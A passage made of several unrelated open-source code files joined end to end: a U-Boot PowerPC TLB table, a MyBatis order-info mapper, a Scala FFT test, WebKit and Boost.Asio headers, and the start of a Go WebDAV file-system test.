SET_TLB_ENTRY(1, CONFIG_SYS_CCSRBAR, CONFIG_SYS_CCSRBAR_PHYS,
MAS3_SX|MAS3_SW|MAS3_SR, MAS2_I|MAS2_G,
0, 1, BOOKE_PAGESZ_16M, 1),
/* *I*G* - Flash, localbus */
/* This will be changed to *I*G* after relocation to RAM. */
SET_TLB_ENTRY(1, CONFIG_SYS_FLASH_BASE, CONFIG_SYS_FLASH_BASE_PHYS,
MAS3_SX|MAS3_SR, MAS2_W|MAS2_G,
0, 2, BOOKE_PAGESZ_256M, 1),
#ifndef CONFIG_SPL_BUILD
/* *I*G* - PCI */
SET_TLB_ENTRY(1, CONFIG_SYS_PCIE1_MEM_VIRT, CONFIG_SYS_PCIE1_MEM_PHYS,
MAS3_SX|MAS3_SW|MAS3_SR, MAS2_I|MAS2_G,
0, 3, BOOKE_PAGESZ_1G, 1),
/* *I*G* - PCI I/O */
SET_TLB_ENTRY(1, CONFIG_SYS_PCIE1_IO_VIRT, CONFIG_SYS_PCIE1_IO_PHYS,
MAS3_SX|MAS3_SW|MAS3_SR, MAS2_I|MAS2_G,
0, 4, BOOKE_PAGESZ_256K, 1),
/* Bman/Qman */
#ifdef CONFIG_SYS_BMAN_MEM_PHYS
SET_TLB_ENTRY(1, CONFIG_SYS_BMAN_MEM_BASE, CONFIG_SYS_BMAN_MEM_PHYS,
MAS3_SX|MAS3_SW|MAS3_SR, 0,
0, 5, BOOKE_PAGESZ_16M, 1),
SET_TLB_ENTRY(1, CONFIG_SYS_BMAN_MEM_BASE + 0x01000000,
CONFIG_SYS_BMAN_MEM_PHYS + 0x01000000,
MAS3_SX|MAS3_SW|MAS3_SR, MAS2_I|MAS2_G,
0, 6, BOOKE_PAGESZ_16M, 1),
#endif
#ifdef CONFIG_SYS_QMAN_MEM_PHYS
SET_TLB_ENTRY(1, CONFIG_SYS_QMAN_MEM_BASE, CONFIG_SYS_QMAN_MEM_PHYS,
MAS3_SX|MAS3_SW|MAS3_SR, 0,
0, 7, BOOKE_PAGESZ_16M, 1),
SET_TLB_ENTRY(1, CONFIG_SYS_QMAN_MEM_BASE + 0x01000000,
CONFIG_SYS_QMAN_MEM_PHYS + 0x01000000,
MAS3_SX|MAS3_SW|MAS3_SR, MAS2_I|MAS2_G,
0, 8, BOOKE_PAGESZ_16M, 1),
#endif
#endif
#ifdef CONFIG_SYS_DCSRBAR_PHYS
SET_TLB_ENTRY(1, CONFIG_SYS_DCSRBAR, CONFIG_SYS_DCSRBAR_PHYS,
MAS3_SX|MAS3_SW|MAS3_SR, MAS2_I|MAS2_G,
0, 9, BOOKE_PAGESZ_4M, 1),
#endif
#ifdef CONFIG_SYS_NAND_BASE
SET_TLB_ENTRY(1, CONFIG_SYS_NAND_BASE, CONFIG_SYS_NAND_BASE_PHYS,
MAS3_SX|MAS3_SW|MAS3_SR, MAS2_I|MAS2_G,
0, 10, BOOKE_PAGESZ_64K, 1),
#endif
#ifdef QIXIS_BASE
SET_TLB_ENTRY(1, QIXIS_BASE, QIXIS_BASE_PHYS,
MAS3_SX|MAS3_SW|MAS3_SR, MAS2_I|MAS2_G,
0, 11, BOOKE_PAGESZ_4K, 1),
#endif
#if defined(CONFIG_RAMBOOT_PBL) && !defined(CONFIG_SPL_BUILD)
SET_TLB_ENTRY(1, CONFIG_SYS_DDR_SDRAM_BASE, CONFIG_SYS_DDR_SDRAM_BASE,
MAS3_SX|MAS3_SW|MAS3_SR, MAS2_M,
0, 12, BOOKE_PAGESZ_1G, 1),
SET_TLB_ENTRY(1, CONFIG_SYS_DDR_SDRAM_BASE + 0x40000000,
CONFIG_SYS_DDR_SDRAM_BASE + 0x40000000,
MAS3_SX|MAS3_SW|MAS3_SR, MAS2_M,
0, 13, BOOKE_PAGESZ_1G, 1)
#endif
/* entry 14 and 15 has been used hard coded, they will be disabled
* in cpu_init_f, so if needed more, will use entry 16 later.
*/
};
int num_tlb_entries = ARRAY_SIZE(tlb_table);
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE mapper PUBLIC "-//mybatis.org//DTD Mapper 3.0//EN"
"http://mybatis.org/dtd/mybatis-3-mapper.dtd">
<mapper namespace="com.github.chengzhx76.service.order.dao.OrderInfoDaoMapper">
<sql id="tableName">order_info</sql>
<sql id="columns">
o.id,o.account_id,o.oid,o.relate_oid,o.amount_payable,o.amount_paid,o.consignee,o.mobile,o.address,o.delivery_time,o.pay,o.arayacak_address,
o.arayacak_delivery_time,o.province,o.city,o.country,o.village,o.order_type,o.freight_reduce,o.freight_payable,o.bonus_point_reduce_price,o.product_total_price,o.discount,
o.balance_offset,o.remark_customer,o.post_code,o.telephone,o.email,o.pay_time,o.pay_way,o.exchange_oid,o.coupon_code,o.coupon_reduce_price,o.flow_status,o.is_free_account_level,o.comment_id,o.since,o.order_status,
o.remarks,o.create_date,o.update_date,o.status
</sql>
<sql id="insertColumns">
id,account_id,oid,relate_oid,amount_payable,amount_paid,consignee,mobile,address,delivery_time,pay,arayacak_address,arayacak_delivery_time,
province,city,country,village,order_type,freight_reduce,freight_payable,product_total_price,discount,remark_customer,balance_offset,post_code,
telephone,email,pay_time,pay_way,exchange_oid,coupon_code,coupon_reduce_price,flow_status,bonus_point_reduce_price,is_free_account_level,comment_id,since,order_status,
remarks,create_date,update_date,status
</sql>
<sql id="orderInfoIf">
<if test="id != null and id != ''">id=#{id},</if>
<if test="accountId != null and accountId != ''">account_id=#{accountId},</if>
<if test="oid != null and oid != ''">oid=#{oid},</if>
<if test="relateOid != null and relateOid != ''">relate_oid=#{relateOid},</if>
<if test="amountPayable != null and amountPayable != ''">amount_payable=#{amountPayable},</if>
<if test="amountPaid != null and amountPaid != ''">amount_paid=#{amountPaid},</if>
<if test="consignee != null and consignee != ''">consignee=#{consignee},</if>
<if test="mobile != null and mobile != ''">mobile=#{mobile},</if>
<if test="address != null and address != ''">address=#{address},</if>
<if test="deliveryTime != null and deliveryTime != ''">delivery_time=#{deliveryTime},</if>
<if test="pay != null and pay != ''">pay=#{pay},</if>
<if test="arayacakAddress != null and arayacakAddress != ''">arayacak_address=#{arayacakAddress},</if>
<if test="arayacakDeliveryTime != null and arayacakDeliveryTime != ''">arayacak_delivery_time=#{arayacakDeliveryTime},</if>
<if test="province != null and province != ''">province=#{province},</if>
<if test="city != null and city != ''">city=#{city},</if>
<if test="country != null and country != ''">country=#{country},</if>
<if test="village != null and village != ''">village=#{village},</if>
<if test="orderType != null and orderType != ''">order_type=#{orderType},</if>
<if test="freightReduce != null and freightReduce != ''">freight_reduce=#{freightReduce},</if>
<if test="freightPayable != null and freightPayable != ''">freight_payable=#{freightPayable},</if>
<if test="productTotalPrice != null and productTotalPrice != ''">product_total_price=#{productTotalPrice},</if>
<if test="discount != null and discount != ''">discount=#{discount},</if>
<if test="balanceOffset != null and balanceOffset != ''">balance_offset=#{balanceOffset},</if>
<if test="remarkCustomer != null and remarkCustomer != ''">remark_customer=#{remarkCustomer},</if>
<if test="postCode != null and postCode != ''">post_code=#{postCode},</if>
<if test="telephone != null and telephone != ''">telephone=#{telephone},</if>
<if test="email != null and email != ''">email=#{email},</if>
<if test="payTime != null and payTime != ''">pay_time=#{payTime},</if>
<if test="payWay != null and payWay != ''">pay_way=#{payWay},</if>
<if test="exchangeOid != null and exchangeOid != ''">exchange_oid=#{exchangeOid},</if>
<if test="couponCode != null and couponCode != ''">coupon_code=#{couponCode},</if>
<if test="couponReducePrice != null and couponReducePrice != ''">coupon_reduce_price=#{couponReducePrice},</if>
<if test="flowStatus != null and flowStatus != ''">flow_status=#{flowStatus},</if>
<if test="bonusPointReducePrice != null and bonusPointReducePrice != ''">bonus_point_reduce_price=#{bonusPointReducePrice},</if>
<if test="isFreeAccountLevel != null and isFreeAccountLevel != ''">is_free_account_level=#{isFreeAccountLevel},</if>
<if test="commentId != null and commentId != ''">comment_Id=#{commentId},</if>
<if test="since != null and since != ''">since=#{since},</if>
<if test="orderStatus != null">order_status=#{orderStatus},</if>
<if test="remarks != null and remarks != ''">remarks=#{remarks},</if>
<if test="createDate != null">create_date=#{createDate},</if>
<if test="updateDate != null">update_date=#{updateDate},</if>
<if test="status != null">status=#{status}</if>
</sql>
<sql id="orderInfoSelector">
select
<include refid="columns"/>
from
<include refid="tableName"/> AS o
</sql>
<sql id="orderInfoWhere">
<where>
<if test="id != null and id != ''">
id = #{id}
</if>
<if test="accountId != null and accountId != ''">
account_id = #{accountId}
</if>
<choose>
<when test="status != null and status !=''">
AND status = #{status}
</when>
<otherwise>
AND status != 'DELETE'
</otherwise>
</choose>
</where>
</sql>
<sql id="orderInfoUpdate">
<trim prefix="SET" suffixOverrides=",">
<include refid="orderInfoIf"/>
</trim>
</sql>
<!-- =================================================================== -->
<select id="load" parameterType="OrderInfo" resultType="OrderInfo">
<include refid="orderInfoSelector"/>
<include refid="orderInfoWhere"/>
</select>
<!-- 获取全部 -->
<select id="loadAll" resultType="OrderInfo">
<include refid="orderInfoSelector"/>
<include refid="orderInfoWhere"/>
</select>
<!-- 获取全部 -->
<select id="loadByUserIdOrderByCreateDate" resultType="OrderInfo">
<include refid="orderInfoSelector"/>
<include refid="orderInfoWhere"/>
ORDER BY create_date DESC
</select>
<!-- 更新 -->
<update id="update" parameterType="OrderInfo">
UPDATE <include refid="tableName"/>
<include refid="orderInfoUpdate"/>
<include refid="orderInfoWhere"/>
</update>
<!-- 插入 -->
<insert id="save" parameterType="OrderInfo">
INSERT INTO
<include refid="tableName"/>
(
<include refid="insertColumns"/>
)
VALUES
(
#{id},#{accountId},#{oid},#{relateOid},#{amountPayable},#{amountPaid},#{consignee},#{mobile},#{address},#{deliveryTime},#{pay},#{arayacakAddress},#{arayacakDeliveryTime},
#{province},#{city},#{country},#{village},#{orderType},#{freightReduce},#{freightPayable},#{productTotalPrice},#{discount},#{remarkCustomer},#{balanceOffset},#{postCode},
#{telephone},#{email},#{payTime},#{payWay},#{exchangeOid},#{couponCode},#{couponReducePrice},#{flowStatus},#{bonusPointReducePrice},#{isFreeAccountLevel},#{commentId},#{since},#{orderStatus},
#{remarks},#{createDate},#{updateDate},#{status}
)
</insert>
</mapper>
| {
"pile_set_name": "Github"
} |
package keystoneml.nodes.stats
import breeze.linalg._
import org.apache.spark.SparkContext
import org.scalatest.FunSuite
import keystoneml.pipelines.Logging
import keystoneml.utils.Stats
import keystoneml.workflow.PipelineContext
class PaddedFFTSuite extends FunSuite with PipelineContext with Logging {
test("Test PaddedFFT node") {
sc = new SparkContext("local", "test")
// Set up a test matrix.
val ones = DenseVector.zeros[Double](100)
val twos = DenseVector.zeros[Double](100)
ones(0) = 1.0
twos(2) = 1.0
val x = sc.parallelize(Seq(twos, ones))
val fftd = PaddedFFT().apply(x).collect()
val twosout = fftd(0)
val onesout = fftd(1)
// Proof by agreement w/ R: Re(fft(c(0, 0, 1, rep(0, 125))))
assert(twosout.length === 64)
assert(Stats.aboutEq(twosout(0), 1.0))
assert(Stats.aboutEq(twosout(16), 0.0))
assert(Stats.aboutEq(twosout(32), -1.0))
assert(Stats.aboutEq(twosout(48), 0.0))
// Proof by agreement w/ R: Re(fft(c(1, rep(0, 127))))
assert(Stats.aboutEq(onesout, DenseVector.ones[Double](64)))
}
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2017 Igalia S.L.
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Library General Public
* License as published by the Free Software Foundation; either
* version 2 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Library General Public License for more details.
*
* You should have received a copy of the GNU Library General Public License
* along with this library; see the file COPYING.LIB. If not, write to
* the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
* Boston, MA 02110-1301, USA.
*/
#if !defined(__WEBKIT_H_INSIDE__) && !defined(WEBKIT2_COMPILATION)
#error "Only <wpe/webkit.h> can be included directly."
#endif
#ifndef WebKitWebsiteData_h
#define WebKitWebsiteData_h
#include <glib-object.h>
#include <wpe/WebKitDefines.h>
G_BEGIN_DECLS
#define WEBKIT_TYPE_WEBSITE_DATA (webkit_website_data_get_type())
typedef struct _WebKitWebsiteData WebKitWebsiteData;
/**
* WebKitWebsiteDataTypes:
* @WEBKIT_WEBSITE_DATA_MEMORY_CACHE: Memory cache.
* @WEBKIT_WEBSITE_DATA_DISK_CACHE: HTTP disk cache.
* @WEBKIT_WEBSITE_DATA_OFFLINE_APPLICATION_CACHE: Offline web application cache.
* @WEBKIT_WEBSITE_DATA_SESSION_STORAGE: Session storage data.
* @WEBKIT_WEBSITE_DATA_LOCAL_STORAGE: Local storage data.
* @WEBKIT_WEBSITE_DATA_WEBSQL_DATABASES: WebSQL databases. Deprecated 2.24
* @WEBKIT_WEBSITE_DATA_INDEXEDDB_DATABASES: IndexedDB databases.
* @WEBKIT_WEBSITE_DATA_PLUGIN_DATA: Plugins data. Deprecated 2.32
* @WEBKIT_WEBSITE_DATA_COOKIES: Cookies.
* @WEBKIT_WEBSITE_DATA_DEVICE_ID_HASH_SALT: Hash salt used to generate the device ids used by webpages. Since 2.24
* @WEBKIT_WEBSITE_DATA_HSTS_CACHE: HSTS cache. Since 2.26
* @WEBKIT_WEBSITE_DATA_ITP: Intelligent Tracking Prevention data. Since 2.30.
* @WEBKIT_WEBSITE_DATA_SERVICE_WORKER_REGISTRATIONS: Service worker registrations. Since 2.30
* @WEBKIT_WEBSITE_DATA_DOM_CACHE: DOM (CacheStorage) cache. Since 2.30
* @WEBKIT_WEBSITE_DATA_ALL: All types.
*
* Enum values with flags representing types of Website data.
*
* Since: 2.16
*/
typedef enum {
WEBKIT_WEBSITE_DATA_MEMORY_CACHE = 1 << 0,
WEBKIT_WEBSITE_DATA_DISK_CACHE = 1 << 1,
WEBKIT_WEBSITE_DATA_OFFLINE_APPLICATION_CACHE = 1 << 2,
WEBKIT_WEBSITE_DATA_SESSION_STORAGE = 1 << 3,
WEBKIT_WEBSITE_DATA_LOCAL_STORAGE = 1 << 4,
WEBKIT_WEBSITE_DATA_WEBSQL_DATABASES = 1 << 5,
WEBKIT_WEBSITE_DATA_INDEXEDDB_DATABASES = 1 << 6,
WEBKIT_WEBSITE_DATA_PLUGIN_DATA = 1 << 7,
WEBKIT_WEBSITE_DATA_COOKIES = 1 << 8,
WEBKIT_WEBSITE_DATA_DEVICE_ID_HASH_SALT = 1 << 9,
WEBKIT_WEBSITE_DATA_HSTS_CACHE = 1 << 10,
WEBKIT_WEBSITE_DATA_ITP = 1 << 11,
WEBKIT_WEBSITE_DATA_SERVICE_WORKER_REGISTRATIONS = 1 << 12,
WEBKIT_WEBSITE_DATA_DOM_CACHE = 1 << 13,
WEBKIT_WEBSITE_DATA_ALL = (1 << 14) - 1
} WebKitWebsiteDataTypes;
WEBKIT_API GType
webkit_website_data_get_type (void);
WEBKIT_API WebKitWebsiteData *
webkit_website_data_ref (WebKitWebsiteData *website_data);
WEBKIT_API void
webkit_website_data_unref (WebKitWebsiteData *website_data);
WEBKIT_API const char *
webkit_website_data_get_name (WebKitWebsiteData *website_data);
WEBKIT_API WebKitWebsiteDataTypes
webkit_website_data_get_types (WebKitWebsiteData *website_data);
WEBKIT_API guint64
webkit_website_data_get_size (WebKitWebsiteData *website_data,
WebKitWebsiteDataTypes types);
G_END_DECLS
#endif /* WebKitWebsiteData_h */
| {
"pile_set_name": "Github"
} |
//
// windows/basic_handle.hpp
// ~~~~~~~~~~~~~~~~~~~~~~~~
//
// Copyright (c) 2003-2014 Christopher M. Kohlhoff (chris at kohlhoff dot com)
//
// Distributed under the Boost Software License, Version 1.0. (See accompanying
// file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
//
#ifndef BOOST_ASIO_WINDOWS_BASIC_HANDLE_HPP
#define BOOST_ASIO_WINDOWS_BASIC_HANDLE_HPP
#if defined(_MSC_VER) && (_MSC_VER >= 1200)
# pragma once
#endif // defined(_MSC_VER) && (_MSC_VER >= 1200)
#include <boost/asio/detail/config.hpp>
#if defined(BOOST_ASIO_HAS_WINDOWS_RANDOM_ACCESS_HANDLE) \
|| defined(BOOST_ASIO_HAS_WINDOWS_STREAM_HANDLE) \
|| defined(BOOST_ASIO_HAS_WINDOWS_OBJECT_HANDLE) \
|| defined(GENERATING_DOCUMENTATION)
#include <boost/asio/basic_io_object.hpp>
#include <boost/asio/detail/throw_error.hpp>
#include <boost/asio/error.hpp>
#include <boost/asio/detail/push_options.hpp>
namespace boost {
namespace asio {
namespace windows {
/// Provides Windows handle functionality.
/**
* The windows::basic_handle class template provides the ability to wrap a
* Windows handle.
*
* @par Thread Safety
* @e Distinct @e objects: Safe.@n
* @e Shared @e objects: Unsafe.
*/
template <typename HandleService>
class basic_handle
: public basic_io_object<HandleService>
{
public:
/// (Deprecated: Use native_handle_type.) The native representation of a
/// handle.
typedef typename HandleService::native_handle_type native_type;
/// The native representation of a handle.
typedef typename HandleService::native_handle_type native_handle_type;
/// A basic_handle is always the lowest layer.
typedef basic_handle<HandleService> lowest_layer_type;
/// Construct a basic_handle without opening it.
/**
* This constructor creates a handle without opening it.
*
* @param io_service The io_service object that the handle will use to
* dispatch handlers for any asynchronous operations performed on the handle.
*/
explicit basic_handle(boost::asio::io_service& io_service)
: basic_io_object<HandleService>(io_service)
{
}
/// Construct a basic_handle on an existing native handle.
/**
* This constructor creates a handle object to hold an existing native handle.
*
* @param io_service The io_service object that the handle will use to
* dispatch handlers for any asynchronous operations performed on the handle.
*
* @param handle A native handle.
*
* @throws boost::system::system_error Thrown on failure.
*/
basic_handle(boost::asio::io_service& io_service,
const native_handle_type& handle)
: basic_io_object<HandleService>(io_service)
{
boost::system::error_code ec;
this->get_service().assign(this->get_implementation(), handle, ec);
boost::asio::detail::throw_error(ec, "assign");
}
#if defined(BOOST_ASIO_HAS_MOVE) || defined(GENERATING_DOCUMENTATION)
/// Move-construct a basic_handle from another.
/**
* This constructor moves a handle from one object to another.
*
* @param other The other basic_handle object from which the move will occur.
*
* @note Following the move, the moved-from object is in the same state as if
* constructed using the @c basic_handle(io_service&) constructor.
*/
basic_handle(basic_handle&& other)
: basic_io_object<HandleService>(
BOOST_ASIO_MOVE_CAST(basic_handle)(other))
{
}
/// Move-assign a basic_handle from another.
/**
* This assignment operator moves a handle from one object to another.
*
* @param other The other basic_handle object from which the move will occur.
*
* @note Following the move, the moved-from object is in the same state as if
* constructed using the @c basic_handle(io_service&) constructor.
*/
basic_handle& operator=(basic_handle&& other)
{
basic_io_object<HandleService>::operator=(
BOOST_ASIO_MOVE_CAST(basic_handle)(other));
return *this;
}
#endif // defined(BOOST_ASIO_HAS_MOVE) || defined(GENERATING_DOCUMENTATION)
/// Get a reference to the lowest layer.
/**
* This function returns a reference to the lowest layer in a stack of
* layers. Since a basic_handle cannot contain any further layers, it simply
* returns a reference to itself.
*
* @return A reference to the lowest layer in the stack of layers. Ownership
* is not transferred to the caller.
*/
lowest_layer_type& lowest_layer()
{
return *this;
}
/// Get a const reference to the lowest layer.
/**
* This function returns a const reference to the lowest layer in a stack of
* layers. Since a basic_handle cannot contain any further layers, it simply
* returns a reference to itself.
*
* @return A const reference to the lowest layer in the stack of layers.
* Ownership is not transferred to the caller.
*/
const lowest_layer_type& lowest_layer() const
{
return *this;
}
/// Assign an existing native handle to the handle.
/*
* This function opens the handle to hold an existing native handle.
*
* @param handle A native handle.
*
* @throws boost::system::system_error Thrown on failure.
*/
void assign(const native_handle_type& handle)
{
boost::system::error_code ec;
this->get_service().assign(this->get_implementation(), handle, ec);
boost::asio::detail::throw_error(ec, "assign");
}
/// Assign an existing native handle to the handle.
/*
* This function opens the handle to hold an existing native handle.
*
* @param handle A native handle.
*
* @param ec Set to indicate what error occurred, if any.
*/
boost::system::error_code assign(const native_handle_type& handle,
boost::system::error_code& ec)
{
return this->get_service().assign(this->get_implementation(), handle, ec);
}
/// Determine whether the handle is open.
bool is_open() const
{
return this->get_service().is_open(this->get_implementation());
}
/// Close the handle.
/**
* This function is used to close the handle. Any asynchronous read or write
* operations will be cancelled immediately, and will complete with the
* boost::asio::error::operation_aborted error.
*
* @throws boost::system::system_error Thrown on failure.
*/
void close()
{
boost::system::error_code ec;
this->get_service().close(this->get_implementation(), ec);
boost::asio::detail::throw_error(ec, "close");
}
/// Close the handle.
/**
* This function is used to close the handle. Any asynchronous read or write
* operations will be cancelled immediately, and will complete with the
* boost::asio::error::operation_aborted error.
*
* @param ec Set to indicate what error occurred, if any.
*/
boost::system::error_code close(boost::system::error_code& ec)
{
return this->get_service().close(this->get_implementation(), ec);
}
/// (Deprecated: Use native_handle().) Get the native handle representation.
/**
* This function may be used to obtain the underlying representation of the
* handle. This is intended to allow access to native handle functionality
* that is not otherwise provided.
*/
native_type native()
{
return this->get_service().native_handle(this->get_implementation());
}
/// Get the native handle representation.
/**
* This function may be used to obtain the underlying representation of the
* handle. This is intended to allow access to native handle functionality
* that is not otherwise provided.
*/
native_handle_type native_handle()
{
return this->get_service().native_handle(this->get_implementation());
}
/// Cancel all asynchronous operations associated with the handle.
/**
* This function causes all outstanding asynchronous read or write operations
* to finish immediately, and the handlers for cancelled operations will be
* passed the boost::asio::error::operation_aborted error.
*
* @throws boost::system::system_error Thrown on failure.
*/
void cancel()
{
boost::system::error_code ec;
this->get_service().cancel(this->get_implementation(), ec);
boost::asio::detail::throw_error(ec, "cancel");
}
/// Cancel all asynchronous operations associated with the handle.
/**
* This function causes all outstanding asynchronous read or write operations
* to finish immediately, and the handlers for cancelled operations will be
* passed the boost::asio::error::operation_aborted error.
*
* @param ec Set to indicate what error occurred, if any.
*/
boost::system::error_code cancel(boost::system::error_code& ec)
{
return this->get_service().cancel(this->get_implementation(), ec);
}
protected:
/// Protected destructor to prevent deletion through this type.
~basic_handle()
{
}
};
} // namespace windows
} // namespace asio
} // namespace boost
#include <boost/asio/detail/pop_options.hpp>
#endif // defined(BOOST_ASIO_HAS_WINDOWS_RANDOM_ACCESS_HANDLE)
// || defined(BOOST_ASIO_HAS_WINDOWS_STREAM_HANDLE)
// || defined(BOOST_ASIO_HAS_WINDOWS_OBJECT_HANDLE)
// || defined(GENERATING_DOCUMENTATION)
#endif // BOOST_ASIO_WINDOWS_BASIC_HANDLE_HPP
| {
"pile_set_name": "Github"
} |
// Copyright 2014 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package webdav
import (
"encoding/xml"
"fmt"
"io"
"io/ioutil"
"os"
"path"
"path/filepath"
"reflect"
"runtime"
"sort"
"strconv"
"strings"
"testing"
"golang.org/x/net/context"
)
func TestSlashClean(t *testing.T) {
testCases := []string{
"",
".",
"/",
"/./",
"//",
"//.",
"//a",
"/a",
"/a/b/c",
"/a//b/./../c/d/",
"a",
"a/b/c",
}
for _, tc := range testCases {
got := slashClean(tc)
want := path.Clean("/" + tc)
if got != want {
t.Errorf("tc=%q: got %q, want %q", tc, got, want)
}
}
}
func TestDirResolve(t *testing.T) {
testCases := []struct {
dir, name, want string
}{
{"/", "", "/"},
{"/", "/", "/"},
{"/", ".", "/"},
{"/", "./a", "/a"},
{"/", "..", "/"},
{"/", "..", "/"},
{"/", "../", "/"},
{"/", "../.", "/"},
{"/", "../a", "/a"},
{"/", "../..", "/"},
{"/", "../bar/a", "/bar/a"},
{"/", "../baz/a", "/baz/a"},
{"/", "...", "/..."},
{"/", ".../a", "/.../a"},
{"/", ".../..", "/"},
{"/", "a", "/a"},
{"/", "a/./b", "/a/b"},
{"/", "a/../../b", "/b"},
{"/", "a/../b", "/b"},
{"/", "a/b", "/a/b"},
{"/", "a/b/c/../../d", "/a/d"},
{"/", "a/b/c/../../../d", "/d"},
{"/", "a/b/c/../../../../d", "/d"},
{"/", "a/b/c/d", "/a/b/c/d"},
{"/foo/bar", "", "/foo/bar"},
{"/foo/bar", "/", "/foo/bar"},
{"/foo/bar", ".", "/foo/bar"},
{"/foo/bar", "./a", "/foo/bar/a"},
{"/foo/bar", "..", "/foo/bar"},
{"/foo/bar", "../", "/foo/bar"},
{"/foo/bar", "../.", "/foo/bar"},
{"/foo/bar", "../a", "/foo/bar/a"},
{"/foo/bar", "../..", "/foo/bar"},
{"/foo/bar", "../bar/a", "/foo/bar/bar/a"},
{"/foo/bar", "../baz/a", "/foo/bar/baz/a"},
{"/foo/bar", "...", "/foo/bar/..."},
{"/foo/bar", ".../a", "/foo/bar/.../a"},
{"/foo/bar", ".../..", "/foo/bar"},
{"/foo/bar", "a", "/foo/bar/a"},
{"/foo/bar", "a/./b", "/foo/bar/a/b"},
{"/foo/bar", "a/../../b", "/foo/bar/b"},
{"/foo/bar", "a/../b", "/foo/bar/b"},
{"/foo/bar", "a/b", "/foo/bar/a/b"},
{"/foo/bar", "a/b/c/../../d", "/foo/bar/a/d"},
{"/foo/bar", "a/b/c/../../../d", "/foo/bar/d"},
{"/foo/bar", "a/b/c/../../../../d", "/foo/bar/d"},
{"/foo/bar", "a/b/c/d", "/foo/bar/a/b/c/d"},
{"/foo/bar/", "", "/foo/bar"},
{"/foo/bar/", "/", "/foo/bar"},
{"/foo/bar/", ".", "/foo/bar"},
{"/foo/bar/", "./a", "/foo/bar/a"},
{"/foo/bar/", "..", "/foo/bar"},
{"/foo//bar///", "", "/foo/bar"},
{"/foo//bar///", "/", "/foo/bar"},
{"/foo//bar///", ".", "/foo/bar"},
{"/foo//bar///", "./a", "/foo/bar/a"},
{"/foo//bar///", "..", "/foo/bar"},
{"/x/y/z", "ab/c\x00d/ef", ""},
{".", "", "."},
{".", "/", "."},
{".", ".", "."},
{".", "./a", "a"},
{".", "..", "."},
{".", "..", "."},
{".", "../", "."},
{".", "../.", "."},
{".", "../a", "a"},
{".", "../..", "."},
{".", "../bar/a", "bar/a"},
{".", "../baz/a", "baz/a"},
{".", "...", "..."},
{".", ".../a", ".../a"},
{".", ".../..", "."},
{".", "a", "a"},
{".", "a/./b", "a/b"},
{".", "a/../../b", "b"},
{".", "a/../b", "b"},
{".", "a/b", "a/b"},
{".", "a/b/c/../../d", "a/d"},
{".", "a/b/c/../../../d", "d"},
{".", "a/b/c/../../../../d", "d"},
{".", "a/b/c/d", "a/b/c/d"},
{"", "", "."},
{"", "/", "."},
{"", ".", "."},
{"", "./a", "a"},
{"", "..", "."},
}
for _, tc := range testCases {
d := Dir(filepath.FromSlash(tc.dir))
if got := filepath.ToSlash(d.resolve(tc.name)); got != tc.want {
t.Errorf("dir=%q, name=%q: got %q, want %q", tc.dir, tc.name, got, tc.want)
}
}
}
func TestWalk(t *testing.T) {
type walkStep struct {
name, frag string
final bool
}
testCases := []struct {
dir string
want []walkStep
}{
{"", []walkStep{
{"", "", true},
}},
{"/", []walkStep{
{"", "", true},
}},
{"/a", []walkStep{
{"", "a", true},
}},
{"/a/", []walkStep{
{"", "a", true},
}},
{"/a/b", []walkStep{
{"", "a", false},
{"a", "b", true},
}},
{"/a/b/", []walkStep{
{"", "a", false},
{"a", "b", true},
}},
{"/a/b/c", []walkStep{
{"", "a", false},
{"a", "b", false},
{"b", "c", true},
}},
// The following test case is the one mentioned explicitly
// in the method description.
{"/foo/bar/x", []walkStep{
{"", "foo", false},
{"foo", "bar", false},
{"bar", "x", true},
}},
}
ctx := context.Background()
for _, tc := range testCases {
fs := NewMemFS().(*memFS)
parts := strings.Split(tc.dir, "/")
for p := 2; p < len(parts); p++ {
d := strings.Join(parts[:p], "/")
if err := fs.Mkdir(ctx, d, 0666); err != nil {
t.Errorf("tc.dir=%q: mkdir: %q: %v", tc.dir, d, err)
}
}
i, prevFrag := 0, ""
err := fs.walk("test", tc.dir, func(dir *memFSNode, frag string, final bool) error {
got := walkStep{
name: prevFrag,
frag: frag,
final: final,
}
want := tc.want[i]
if got != want {
return fmt.Errorf("got %+v, want %+v", got, want)
}
i, prevFrag = i+1, frag
return nil
})
if err != nil {
t.Errorf("tc.dir=%q: %v", tc.dir, err)
}
}
}
// find appends to ss the names of the named file and its children. It is
// analogous to the Unix find command.
//
// The returned strings are not guaranteed to be in any particular order.
func find(ctx context.Context, ss []string, fs FileSystem, name string) ([]string, error) {
stat, err := fs.Stat(ctx, name)
if err != nil {
return nil, err
}
ss = append(ss, name)
if stat.IsDir() {
f, err := fs.OpenFile(ctx, name, os.O_RDONLY, 0)
if err != nil {
return nil, err
}
defer f.Close()
children, err := f.Readdir(-1)
if err != nil {
return nil, err
}
for _, c := range children {
ss, err = find(ctx, ss, fs, path.Join(name, c.Name()))
if err != nil {
return nil, err
}
}
}
return ss, nil
}
func testFS(t *testing.T, fs FileSystem) {
errStr := func(err error) string {
switch {
case os.IsExist(err):
return "errExist"
case os.IsNotExist(err):
return "errNotExist"
case err != nil:
return "err"
}
return "ok"
}
// The non-"find" non-"stat" test cases should change the file system state. The
// indentation of the "find"s and "stat"s helps distinguish such test cases.
testCases := []string{
" stat / want dir",
" stat /a want errNotExist",
" stat /d want errNotExist",
" stat /d/e want errNotExist",
"create /a A want ok",
" stat /a want 1",
"create /d/e EEE want errNotExist",
"mk-dir /a want errExist",
"mk-dir /d/m want errNotExist",
"mk-dir /d want ok",
" stat /d want dir",
"create /d/e EEE want ok",
" stat /d/e want 3",
" find / /a /d /d/e",
"create /d/f FFFF want ok",
"create /d/g GGGGGGG want ok",
"mk-dir /d/m want ok",
"mk-dir /d/m want errExist",
"create /d/m/p PPPPP want ok",
" stat /d/e want 3",
" stat /d/f want 4",
" stat /d/g want 7",
" stat /d/h want errNotExist",
" stat /d/m want dir",
" stat /d/m/p want 5",
" find / /a /d /d/e /d/f /d/g /d/m /d/m/p",
"rm-all /d want ok",
" stat /a want 1",
